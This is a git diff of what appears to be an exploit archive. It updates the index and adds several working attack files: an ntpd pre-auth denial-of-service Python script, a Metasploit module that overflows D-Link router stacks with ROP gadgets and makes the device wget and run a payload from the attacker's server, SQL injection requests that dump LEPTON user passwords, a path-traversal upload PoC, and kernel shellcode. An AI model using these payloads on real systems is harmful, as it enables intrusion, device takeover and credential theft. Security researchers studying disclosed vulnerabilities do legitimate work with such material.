Scripting",2007-12-31,Doz,php,webapps,0 -30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 - category q Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 -30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 - order return Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 -30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 - user/remindComplete email Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 +30964,platforms/php/webapps/30964.txt,"LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 +30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 - 'q' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 +30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 +30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 - 'email' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 30979,platforms/php/webapps/30979.txt,"WordPress 2.2.3 - 'wp-admin/edit.php' backup Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30980,platforms/php/webapps/30980.txt,"AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30981,platforms/php/webapps/30981.txt,"PRO-Search 0.17 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 @@ -35190,7 +35195,7 @@ id,file,description,date,author,platform,type,port 37308,platforms/php/webapps/37308.txt,"Ruubikcms 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps,0 37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0 37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 - Local File Inclusion",2012-05-23,AkaStep,php,webapps,0 -37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - module.php Multiple Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 +37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - 'module.php' Multiple Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 - modules.php URI Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 - includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37314,platforms/php/webapps/37314.txt,"Yellow Duck Framework 2.0 Beta1 - Local File Disclosure",2012-05-23,L3b-r1'z,php,webapps,0 @@ -35744,7 +35749,7 @@ id,file,description,date,author,platform,type,port 38236,platforms/php/webapps/38236.txt,"gpEasy CMS - 'section' Parameter Cross-Site Scripting",2013-01-23,"High-Tech Bridge SA",php,webapps,0 38237,platforms/php/webapps/38237.txt,"WordPress Theme Chocolate WP - Multiple Security Vulnerabilities",2013-01-23,"Eugene Dokukin",php,webapps,0 38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injection",2013-01-25,AkaStep,php,webapps,0 -38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection",2015-09-18,jsass,php,webapps,80 +38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - 'load_data_for_search.php' SQL Injection",2015-09-18,jsass,php,webapps,80 38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,Orwelllabs,hardware,webapps,0 38246,platforms/php/webapps/38246.txt,"iCart Pro - 'section' Parameter SQL Injection",2013-01-25,n3tw0rk,php,webapps,0 38251,platforms/php/webapps/38251.txt,"WordPress Plugin WP-Table Reloaded - 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0 @@ -36792,4 +36797,11 @@ id,file,description,date,author,platform,type,port 40783,platforms/php/webapps/40783.txt,"Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection",2016-11-12,"Lenon Leite",php,webapps,0 40776,platforms/php/webapps/40776.txt,"EditMe CMS - Cross-Site Request Forgery (Add New Admin)",2016-11-18,Vulnerability-Lab,php,webapps,0 40791,platforms/php/webapps/40791.txt,"ScriptCase 8.1.053 - Multiple Vulnerabilities",2016-11-20,hyp3rlinx,php,webapps,0 -40792,platforms/php/webapps/40792.txt,"CMS Made Simple 2.1.5 - Cross-Site Scripting",2016-11-01,"liu zhu",php,webapps,0 +40794,platforms/java/webapps/40794.txt,"Atlassian Confluence AppFusions Doxygen 1.3.0 - Directory Traversal",2016-11-21,"Julien Ahrens",java,webapps,0 +40795,platforms/php/webapps/40795.html,"WordPress Plugin Instagram Feed 1.4.6.2 - Cross-Site Request Forgery",2016-11-21,"Sipke Mellema",php,webapps,80 +40799,platforms/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",python,webapps,80 +40800,platforms/php/webapps/40800.txt,"LEPTON 2.2.2 - SQL Injection",2016-11-21,"Curesec Research Team",php,webapps,80 +40801,platforms/php/webapps/40801.txt,"LEPTON 2.2.2 - Remote Code Execution",2016-11-21,"Curesec Research Team",php,webapps,80 +40802,platforms/php/webapps/40802.txt,"FUDforum 3.0.6 - Cross-Site Scripting / Cross-Site Request Forgery",2016-11-21,"Curesec Research Team",php,webapps,80 +40803,platforms/php/webapps/40803.txt,"FUDforum 3.0.6 - Local File Inclusion",2016-11-21,"Curesec Research Team",php,webapps,80 +40804,platforms/php/webapps/40804.txt,"Wordpress Plugin Olimometer 2.56 - SQL Injection",2016-11-21,"TAD GROUP",php,webapps,0 diff --git a/platforms/java/webapps/40794.txt b/platforms/java/webapps/40794.txt new file mode 100755 index 000000000..05066850b --- /dev/null +++ b/platforms/java/webapps/40794.txt @@ -0,0 +1,137 @@ +RCE Security Advisory +https://www.rcesecurity.com + + +1. ADVISORY INFORMATION +======================= +Product: AppFusions Doxygen for Atlassian Confluence +Vendor URL: www.appfusions.com +Type: Path Traversal [CWE-22] +Date found: 2016-06-23 +Date published: - +CVSSv3 Score: 6.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L) +CVE: - + + +2. CREDITS +========== +This vulnerability was discovered and researched by Julien Ahrens from +RCE Security. + + +3. VERSIONS AFFECTED +==================== +AppFusions Doxygen for Atlassian Confluence v1.3.0 +older versions may be affected too. + + +4. INTRODUCTION +=============== +With Doxygen in Confluence, you can embed full-structure code documentation: +-Doxygen blueprint in Confluence to allow Doxygen archive imports +-Display documentation from annotated sources such as Java (i.e., JavaDoc), + C++, Objective-C, C#, C, PHP, Python, IDL (Corba, Microsoft, and +UNO/OpenOffice + flavors), Fortran, VHDL, Tcl, D in Confluence. +-Navigation supports code structure (classes, hierarchies, files), element + dependencies, inheritance and collaboration diagrams. +-Search documentation from within Confluence +-Restrict access to who can see/add what +-Doxygen in JIRA also available + +(from the vendor's homepage) + + +5. VULNERABILITY DETAILS +======================== +The application offers the functionality to import zipped Doxygen +documentations via a file upload to make them available within a +Confluence page. However the application does not properly validate the +"tempId" parameter, which represents the directory where the contents of +the uploaded file will be extracted and stored to. This leads to a path +traversal vulnerability when "/../" sequences are used as part of the +"tempId" parameter. Since the contents of the uploaded file are +extracted to the traversed directory, this vulnerability could also lead +to Remote Code Execution. + +In DoxygenUploadServlet.java (lines 63-64) the "tempId" parameter is +read as part of a GET request to "/plugins/servlet/doxygen/upload" and +afterwards used in a "getTemporaryDirectory()" call: + +String tempId = request.getParameter("tempId"); +String destination = +this.doxygenManager.getTemporaryDirectory(tempId).getAbsolutePath(); + +The "getTemporaryDirectory()" function is defined in +DefaultDoxyGenManager.java (lines 38-41) and constructs a file object +based on the "java.io.tmpdir" variable, the static string +"/doxygen-temp/", the user-supplied "tempId" and a file separator in +between all parts: + +public File getTemporaryDirectory(String tempId) { + File file = new File(System.getProperty("java.io.tmpdir") + +File.separator + "doxygen-temp" + File.separator + tempId); + return file; +} + +In the subsequent code the uploaded file as represented by the "file" +HTTP POST parameter to "/plugins/servlet/doxygen/upload" is extracted to +the directory which was built using the "file" object. + +The following Proof-of-Concept triggers this vulnerability by uploading +a zipped file, which will be extracted to "/home/confluence" by the +application: + +POST +/plugins/servlet/doxygen/upload?tempId=/../../../../../../home/confluence +HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 +Firefox/46.0 +Accept: application/json +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Cache-Control: no-cache +X-Requested-With: XMLHttpRequest +Content-Length: 966 +Content-Type: multipart/form-data; +boundary=---------------------------62841490314755966452122422550 +Cookie: doc-sidebar=300px; doxygen_width=256; +JSESSIONID=75A487B49F38A536358C728B1BE5A9E1 +Connection: close + +-----------------------------62841490314755966452122422550 +Content-Disposition: form-data; name="file"; filename="Traversal.zip" +Content-Type: application/zip + +[zipped data] +-----------------------------98001232218371736091795669059-- + + +6. RISK +======= +To successfully exploit this vulnerability the attacker must be +authenticated and must have the rights within Atlassian Confluence to +upload Doxygen files (default). + +The vulnerability allows remote attackers to upload arbitrary files to +any destination directory writeable by the user of the web server, which +could lead to Remote Code Execution. + + +7. SOLUTION +=========== +Update to AppFusions Doxygen for Atlassian Confluence v1.3.4 + + +8. REPORT TIMELINE (DD/MM/YYYY) +=============================== +23/06/2016: Discovery of the vulnerability +23/06/2016: Notified vendor via public security mail address +29/06/2016: No response, sent out another notification w/o details +29/06/2016: Response from vendor who asked for full details +30/06/2016: Sent over preliminary advisory with full details +03/07/2016: No response from vendor, sent out a status request +03/07/2016: Vendor temporarily removes product from website +11/07/2016: Vendor releases v1.3.1 which fixes the issue +20/11/2016: Advisory released diff --git a/platforms/linux/dos/40806.py b/platforms/linux/dos/40806.py new file mode 100755 index 000000000..2e413f9d4 --- /dev/null +++ b/platforms/linux/dos/40806.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python + +# Exploit Title: ntpd remote pre-auth Denial of Service +# Date: 2016-11-21 +# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman) +# Website: http://dumpco.re/cve-2016-7434/ +# Vendor Homepage: http://www.ntp.org/ +# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p8.tar.gz +# Version: ntp-4.2.7p22, up to but not including ntp-4.2.8p9, and ntp-4.3.0 up to, but not including ntp-4.3.94 +# CVE: CVE-2016-7434 + +import sys +import socket + +if len(sys.argv) != 3: + print "usage: " + sys.argv[0] + " " + sys.exit(-1) + + +payload = "\x16\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x36\x6e\x6f\x6e\x63\x65\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x48\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x00" + +print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..." +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +sock.sendto(payload, (sys.argv[1], int(sys.argv[2]))) +print "[+] Done!" \ No newline at end of file diff --git a/platforms/linux/local/895.c b/platforms/linux/local/895.c index 193a60cba..fe679c095 100755 --- a/platforms/linux/local/895.c +++ b/platforms/linux/local/895.c @@ -77,17 +77,7 @@ #define MAGIC -123 unsigned char shellcode[] = -"\x60\xe8\x5f\x00\x00\x00\x30\x03\x98\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00 -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 -\x50\x52\x49\x56\x41\x54\x45\x2a\x6b\x65\x72\x6e\x65\x6c\x20\x63\x61\x70\x20 -\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x2c\x20\x28\x63\x29\x20\x32\x30\x30\x34 -\x20\x3c\x73\x64\x40\x68\x79\x73\x74\x65\x72\x69\x61\x2e\x73\x6b\x3e\x2a\x50 -\x52\x49\x56\x41\x54\x45\x5b\xbd\x00\xe0\xff\xff\x21\xe5\x81\x7d\x00\x00\x00 -\x00\xc0\x72\x03\x8b\x6d\x00\x8d\x4b\x08\xb8\xb8\x00\x00\x00\xcd\x80\x8b\x11 -\x8b\x71\x04\x8b\x79\x08\x83\xc5\x04\x39\x55\x00\x75\xf8\x39\x7d\x04\x75\xf3 -\x39\x75\x08\x75\xee\x31\xc0\x48\x89\x45\x00\x89\x45\x04\x89\x45\x08\xb8\xb8 -\x00\x00\x00\x8d\x4b\x14\xcd\x80\xff\x41\x04\x74\x0b\x89\x55\x00\x89\x7d\x04 -\x89\x75\x08\xeb\xc8\x61\xb8\x85\xff\xff\xff\xc3"; +"\x60\xe8\x5f\x00\x00\x00\x30\x03\x98\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x52\x49\x56\x41\x54\x45\x2a\x6b\x65\x72\x6e\x65\x6c\x20\x63\x61\x70\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x2c\x20\x28\x63\x29\x20\x32\x30\x30\x34\x20\x3c\x73\x64\x40\x68\x79\x73\x74\x65\x72\x69\x61\x2e\x73\x6b\x3e\x2a\x50\x52\x49\x56\x41\x54\x45\x5b\xbd\x00\xe0\xff\xff\x21\xe5\x81\x7d\x00\x00\x00\x00\xc0\x72\x03\x8b\x6d\x00\x8d\x4b\x08\xb8\xb8\x00\x00\x00\xcd\x80\x8b\x11\x8b\x71\x04\x8b\x79\x08\x83\xc5\x04\x39\x55\x00\x75\xf8\x39\x7d\x04\x75\xf3\x39\x75\x08\x75\xee\x31\xc0\x48\x89\x45\x00\x89\x45\x04\x89\x45\x08\xb8\xb8\x00\x00\x00\x8d\x4b\x14\xcd\x80\xff\x41\x04\x74\x0b\x89\x55\x00\x89\x7d\x04\x89\x75\x08\xeb\xc8\x61\xb8\x85\xff\xff\xff\xc3"; static ltime gtime() { @@ -563,4 +553,4 @@ printf("waitpid got %d/%d\n", n, errno); cleanup(); } -// milw0rm.com [2005-03-22] +// milw0rm.com [2005-03-22] \ No newline at end of file diff --git a/platforms/multiple/remote/40805.rb b/platforms/multiple/remote/40805.rb new file mode 100755 index 000000000..fc7ce97bd --- /dev/null +++ b/platforms/multiple/remote/40805.rb @@ -0,0 +1,300 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +# Payload working status: +# MIPS: +# - all valid payloads working (the ones that we are able to send without null bytes) +# ARM: +# - inline rev/bind shell works (bind... meh sometimes) +# - stager rev/bind shell FAIL +# - mettle rev/bind fails with sigsegv standalone, but works under strace or gdb... + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow', + 'Description' => %q{ + Several Dlink routers contain a pre-authentication stack buffer overflow vulnerability, which + is exposed on the LAN interface on port 80. This vulnerability affects the HNAP SOAP protocol, + which accepts arbitrarily long strings into certain XML parameters and then copies them into + the stack. + This exploit has been tested on the real devices DIR-818LW and 868L (rev. B), and it was tested + using emulation on the DIR-822, 823, 880, 885, 890 and 895. Others might be affected, and + this vulnerability is present in both MIPS and ARM devices. + The MIPS devices are powered by Lextra RLX processors, which are crippled MIPS cores lacking a + few load and store instructions. Because of this the payloads have to be sent unencoded, which + can cause them to fail, although the bind shell seems to work well. + For the ARM devices, the inline reverse tcp seems to work best. + Check the reference links to see the vulnerable firmware versions. + }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'References' => + [ + ['CVE', '2016-6563'], + ['US-CERT-VU', '677427'], + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt'], + ['URL', 'http://seclists.org/fulldisclosure/2016/Nov/38'] + ], + 'DefaultOptions' => { 'WfsDelay' => 10 }, + 'Stance' => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground (ARM target) + 'Targets' => + [ + [ 'Dlink DIR-818 / 822 / 823 / 850 [MIPS]', + { + 'Offset' => 3072, + 'LibcBase' => 0x2aabe000, # should be the same offset for all firmware versions and all routers + 'Sleep' => 0x56DF0, # sleep() offset into libuClibc-0.9.30.3.so + 'FirstGadget' => 0x4EA1C, # see comments below for gadget information + 'SecondGadget' => 0x2468C, + 'ThirdGadget' => 0x41f3c, + 'PrepShellcode1' => "\x23\xbd\xf3\xc8", # addi sp,sp,-3128 + 'PrepShellcode2' => "\x03\xa0\xf8\x09", # jalr sp + 'BranchDelay' => "\x20\x84\xf8\x30", # addi a0,a0,-2000 (nop) + 'Arch' => ARCH_MIPSBE, + 'Payload' => + { + 'BadChars' => "\x00", + 'EncoderType' => Msf::Encoder::Type::Raw # else it will fail with SIGILL, this CPU is crippled + }, + } + ], + [ 'Dlink DIR-868 (rev. B and C) / 880 / 885 / 890 / 895 [ARM]', + { + 'Offset' => 1024, + 'LibcBase' => 0x400DA000, # we can pick any xyz in 0x40xyz000 (an x of 0/1 works well) + 'System' => 0x5A270, # system() offset into libuClibc-0.9.32.1.so + 'FirstGadget' => 0x18298, # see comments below for gadget information + 'SecondGadget' => 0x40CB8, + 'Arch' => ARCH_ARMLE, + } + ], + ], + 'DisclosureDate' => 'Nov 7 2016', + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(80), + OptString.new('SLEEP', [true, 'Seconds to sleep between requests (ARM only)', '0.5']), + OptString.new('SRVHOST', [true, 'IP address for the HTTP server (ARM only)', '0.0.0.0']), + OptString.new('SRVPORT', [true, 'Port for the HTTP server (ARM only)', '3333']), + OptString.new('SHELL', [true, 'Don\'t change this', '/bin/sh']), + OptString.new('SHELLARG', [true, 'Don\'t change this', 'sh']), + ], self.class) + end + + def check + begin + res = send_request_cgi({ + 'uri' => '/HNAP1/', + 'method' => 'POST', + 'Content-Type' => 'text/xml', + 'headers' => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' } + }) + + if res && res.code == 500 + return Exploit::CheckCode::Detected + end + rescue ::Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + + Exploit::CheckCode::Safe + end + + def calc_encode_addr (offset, big_endian = true) + if big_endian + [(target['LibcBase'] + offset).to_s(16)].pack('H*') + else + [(target['LibcBase'] + offset).to_s(16)].pack('H*').reverse + end + end + + def prepare_shellcode_arm (cmd) + #All these gadgets are from /lib/libuClibc-0.9.32.1.so, which is the library used for all versions of firmware for all ARM routers + + #first_gadget (pops system() address into r3, and second_gadget into PC): + #.text:00018298 LDMFD SP!, {R3,PC} + + #second_gadget (puts the stack pointer into r0 and calls system() at r3): + #.text:00040CB8 MOV R0, SP + #.text:00040CBC BLX R3 + + #system() (Executes argument in r0 (our stack pointer) + #.text:0005A270 system + + #The final payload will be: + #'a' * 1024 + 0xffffffff + 'b' * 16 + 'AAAA' + first_gadget + system() + second_gadget + command + shellcode = rand_text_alpha(target['Offset']) + # filler + "\xff\xff\xff\xff" + # n integer overwrite (see advisory) + rand_text_alpha(16) + # moar filler + rand_text_alpha(4) + # r11 + calc_encode_addr(target['FirstGadget'], false) + # first_gadget + calc_encode_addr(target['System'], false) + # system() address + calc_encode_addr(target['SecondGadget'], false) + # second_gadget + cmd # our command + end + + def prepare_shellcode_mips + #All these gadgets are from /lib/libuClibc-0.9.30.3.so, which is the library used for all versions of firmware for all MIPS routers + + # is at 56DF0 + + #first gadget - execute sleep and call second_gadget + #.text:0004EA1C move $t9, $s0 <- sleep() + #.text:0004EA20 lw $ra, 0x20+var_4($sp) <- second_gadget + #.text:0004EA24 li $a0, 2 <- arg for sleep() + #.text:0004EA28 lw $s0, 0x20+var_8($sp) + #.text:0004EA2C li $a1, 1 + #.text:0004EA30 move $a2, $zero + #.text:0004EA34 jr $t9 + #.text:0004EA38 addiu $sp, 0x20 + + #second gadget - put stack pointer in a1: + #.text:0002468C addiu $s1, $sp, 0x58 + #.text:00024690 li $s0, 0x44 + #.text:00024694 move $a2, $s0 + #.text:00024698 move $a1, $s1 + #.text:0002469C move $t9, $s4 + #.text:000246A0 jalr $t9 + #.text:000246A4 move $a0, $s2 + + #third gadget - call $a1 (stack pointer): + #.text:00041F3C move $t9, $a1 + #.text:00041F40 move $a1, $a2 + #.text:00041F44 addiu $a0, 8 + #.text:00041F48 jr $t9 + #.text:00041F4C nop + + #When the crash occurs, the stack pointer is at xml_tag_value[3128]. In order to have a larger space for the shellcode (2000+ bytes), we can jump back to the beggining of the buffer. + #prep_shellcode_1: 23bdf7a8 addi sp,sp,-3128 + #prep_shellcode_2: 03a0f809 jalr sp + #branch_delay: 2084f830 addi a0,a0,-2000 + + #The final payload will be: + #shellcode + 'a' * (2064 - shellcode.size) + sleep() + '%31' * 4 + '%32' * 4 + '%33' * 4 + third_gadget + first_gadget + 'b' * 0x1c + second_gadget + 'c' * 0x58 + prep_shellcode_1 + prep_shellcode_2 + branch_delay + shellcode = payload.encoded + # exploit + rand_text_alpha(target['Offset'] - payload.encoded.length) + # filler + calc_encode_addr(target['Sleep']) + # s0 + rand_text_alpha(4) + # s1 + rand_text_alpha(4) + # s2 + rand_text_alpha(4) + # s3 + calc_encode_addr(target['ThirdGadget']) + # s4 (third gadget) + calc_encode_addr(target['FirstGadget']) + # initial pc / ra (first_gadget) + rand_text_alpha(0x1c) + # filler + calc_encode_addr(target['SecondGadget']) + # second_gadget + rand_text_alpha(0x58) + # filler + target['PrepShellcode1'] + # exploit prep + target['PrepShellcode2'] + # exploit prep + target['BranchDelay'] # exploit prep + end + + def send_payload (payload) + begin + # the payload can go in the Action, Username, LoginPassword or Captcha XML tag + body = %{ + + + + + something + Admin + + #{payload} + + + +} + + res = send_request_cgi({ + 'uri' => '/HNAP1/', + 'method' => 'POST', + 'ctype' => 'text/xml', + 'headers' => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' }, + 'data' => body + }) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router") + end + end + + # Handle incoming requests from the server + def on_request_uri(cli, request) + #print_status("on_request_uri called: #{request.inspect}") + if (not @pl) + print_error("#{peer} - A request came in, but the payload wasn't ready yet!") + return + end + print_status("#{peer} - Sending the payload to the device...") + @elf_sent = true + send_response(cli, @pl) + end + + def exploit + print_status("#{peer} - Attempting to exploit #{target.name}") + if target == targets[0] + send_payload(prepare_shellcode_mips) + else + downfile = rand_text_alpha(8+rand(8)) + @pl = generate_payload_exe + @elf_sent = false + resource_uri = '/' + downfile + + #do not use SSL + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + + if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") + srv_host = Rex::Socket.source_address(rhost) + else + srv_host = datastore['SRVHOST'] + end + + service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri + print_status("#{peer} - Starting up our web service on #{service_url} ...") + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + + datastore['SSL'] = true if ssl_restore + print_status("#{peer} - Asking the device to download and execute #{service_url}") + + filename = rand_text_alpha_lower(rand(8) + 2) + cmd = "wget #{service_url} -O /tmp/#{filename}; chmod +x /tmp/#{filename}; /tmp/#{filename} &" + + shellcode = prepare_shellcode_arm(cmd) + + print_status("#{peer} - \"Bypassing\" the device's ASLR. This might take up to 15 minutes.") + counter = 0.00 + while (not @elf_sent) + if counter % 50.00 == 0 && counter != 0.00 + print_status("#{peer} - Tried #{counter.to_i} times in #{(counter * datastore['SLEEP'].to_f).to_i} seconds.") + end + send_payload(shellcode) + sleep datastore['SLEEP'].to_f # we need to be in the LAN, so a low value (< 1s) is fine + counter += 1 + end + print_status("#{peer} - The device downloaded the payload after #{counter.to_i} tries / #{(counter * datastore['SLEEP'].to_f).to_i} seconds.") + end + end +end \ No newline at end of file diff --git a/platforms/php/webapps/40792.txt b/platforms/php/webapps/40792.txt deleted file mode 100755 index 743230257..000000000 --- a/platforms/php/webapps/40792.txt +++ /dev/null @@ -1,21 +0,0 @@ - Exploit Title: CMS made simple Persistent XSS vulnerability -Date:2016-11-01 -Exploit Author: liu zhu -Vendor Homepage:http://www.cmsmadesimple.org/ -Software Link:http://101.110.118.22/s3.amazonaws.com/cmsms/downloads/13469/cmsms-2.1.5-install.zip -Version:2.1.5 -Tested on:chrome/firefox - -details: -Adminlog.php is used to record the operation log of the administrator and the -website editor. It does not filter the XSS script. So The website editors(lower -Privilege user) can attack the administrator, such as XSS phishing,CSRF. - -The steps to reproduce are below: -1. The website editor logs in and click "Content->news". input any XSS script(such as "") in title and submit. - -2. Then the administrator log in and click "site admin- admin log" , the XSS script will be triggered. - -Affact: -The vulnerability can be used to XSS Phishing or Cookie stolen attack - diff --git a/platforms/php/webapps/40795.html b/platforms/php/webapps/40795.html new file mode 100755 index 000000000..39666d5d3 --- /dev/null +++ b/platforms/php/webapps/40795.html @@ -0,0 +1,71 @@ + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + diff --git a/platforms/php/webapps/40800.txt b/platforms/php/webapps/40800.txt new file mode 100755 index 000000000..4f0afb634 --- /dev/null +++ b/platforms/php/webapps/40800.txt @@ -0,0 +1,113 @@ +Security Advisory - Curesec Research Team + +1. Introduction + +Affected Product: LEPTON 2.2.2 stable +Fixed in: 2.3.0 +Fixed Version Link: http://www.lepton-cms.org/posts/ + important-lepton-2.3.0-101.php +Vendor Website: http://www.lepton-cms.org/ +Vulnerability Type: SQL Injection +Remote Exploitable: Yes +Reported to vendor: 09/05/2016 +Disclosed to 11/10/2016 +public: +Release mode: Coordinated Release +CVE: n/a +Credits Tim Coen of Curesec GmbH + +2. Overview + +Lepton is a content management system written in PHP. In version 2.2.2, it is +vulnerable to multiple SQL injections. The injections require a user account +with elevated privileges. + +3. Details + +SQL Injection: Search Page + +CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P + +Description: The "terms" parameter of the page search is vulnerable to SQL +Injection. A user account with the right "Pages" is required to access this +feature. + +Proof of Concept: + +POST /LEPTON_stable_2.2.2/upload/admins/pages/index.php?leptoken= +3f7020b05ec343675b6b2z1472137594 HTTP/1.1 Host: localhost Accept-Language: +en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID= +fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12 +Connection: close Content-Type: application/x-www-form-urlencoded +Content-Length: 154 search_scope=title&terms=" union select +username,2,3,4,5,6,password,email,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 +from lep_users -- -&search=Search + +Blind or Error-based SQL Injection: Create Page + +CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P + +Description: The "parent" parameter of the create page functionality is +vulnerable to SQL Injection. A user account with the right "Pages" is required +to access this feature. The injection is blind or error based in the case that +PHP is configured to show errors. + +Proof of Concept: + +POST /LEPTON_stable_2.2.2/upload/admins/pages/add.php?leptoken= +dbbbe0a5cca5d279f7cd2z1472142328 HTTP/1.1 Host: localhost Accept-Language: +en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID= +fkb7do1domiofuavvof5qbsv66; lep8765sessionid=uniltg734soq583l03clr0t6j0 +Connection: close Content-Type: application/x-www-form-urlencoded +Content-Length: 84 title=test&type=wysiwyg&parent=0 union select version()& +visibility=public&submit=Add + +Blind or Error-based SQL Injection: Add Droplet + +CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P + +Description: The "Add_droplets" parameter of the droplet permission manager is +vulnerable to SQL injection. A user account with access to the Droplets +administration tool is required. The injection is blind or error based in the +case that PHP is configured to show errors. + +Proof of Concept: + +POST /LEPTON_stable_2.2.2/upload/admins/admintools/tool.php?tool=droplets& +leptoken=1eed21e683f216dbc9dc2z1472139075 HTTP/1.1 Host: localhost +Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: +PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid= +f3a67s8kh379l9bs2rkggtpt12 Connection: close Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded Content-Length: 277 tool= +droplets&perms=1&Add_droplets%5B%5D=1&Add_droplets%5B%5D=2' WHERE attribute= +'Add_droplets' or extractvalue(1,version())%23&Delete_droplets%5B%5D=1& +Export_droplets%5B%5D=1&Import_droplets%5B%5D=1&Manage_backups%5B%5D=1& +Manage_perms%5B%5D=1&Modify_droplets%5B%5D=1&save=Save + +4. Solution + +To mitigate this issue please upgrade at least to version 2.3.0: + +http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php + +Please note that a newer version might already be available. + +5. Report Timeline + +09/05/2016 Informed Vendor about Issue +09/06/2016 Vendor requests 60 days to release fix +10/25/2016 